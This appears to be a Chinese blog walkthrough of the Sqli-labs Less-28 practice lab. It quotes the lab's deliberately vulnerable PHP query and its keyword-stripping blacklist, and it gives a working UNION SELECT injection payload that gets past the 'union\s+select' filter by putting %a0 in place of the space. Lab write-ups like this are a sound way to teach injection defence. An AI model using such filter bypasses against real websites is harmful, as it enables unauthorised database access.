Sqli-labs Less-28 绕过union\s+select过滤 union注入

Apr 09 2020

Sqli-labs Less-28 绕过union\s+select过滤 union注入

作者：绝缘体.. 发布： 2020-04-09 22:15 分类：未分类阅读：抢沙发

关键代码

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);                //strip out /*
$id= preg_replace('/[--]/',"", $id);                //Strip out --.
$id= preg_replace('/[#]/',"", $id);                    //Strip out #.
$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
//$id= preg_replace('/select/m',"", $id);                    //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);        //Strip out UNION & SELECT.
return $id;
}

$id=$_GET['id'];
$id= blacklist($id);
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
//print_r(mysql_error());

正则表达式’/union\s+select/i’中，\s表示空格，+表示匹配一次或多次，/i表示不区分大小写，所以整体表示匹配 union加一个或多个空格加select，其中union和select不区分大小写。

所以我们可以将union 和 select中间的空格使用%a替换，我们直接给出一个payload：

http://127.0.0.1/sql/Less-28/?id=100′)union%a0select%a01,database(),3||(‘1

打赏

本文固定链接: https://www.cxy163.net/archives/4971 | 绝缘体

该日志由绝缘体.. 于 2020年04月09日发表在未分类分类下，你可以发表评论，并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Sqli-labs Less-28 绕过union\s+select过滤 union注入 | 绝缘体
关键字: MySQL, 匹配, 区分, 空格, 表示

【上一篇】Sqli-labs Less-27a 绕过union、select等过滤 union注入
【下一篇】Sqli-labs Less-28a 绕过union\s+select过滤 union注入

Sqli-labs Less-28 绕过union\s+select过滤 union注入

您可能还会对这些文章感兴趣！

Sqli-labs Less-28 绕过union\s+select过滤 union注入：等您坐沙发呢！

发表评论

分类目录

最新日志热评日志随机日志

最活跃的读者

最新评论

标签云集

博客统计

友情链接

用户登录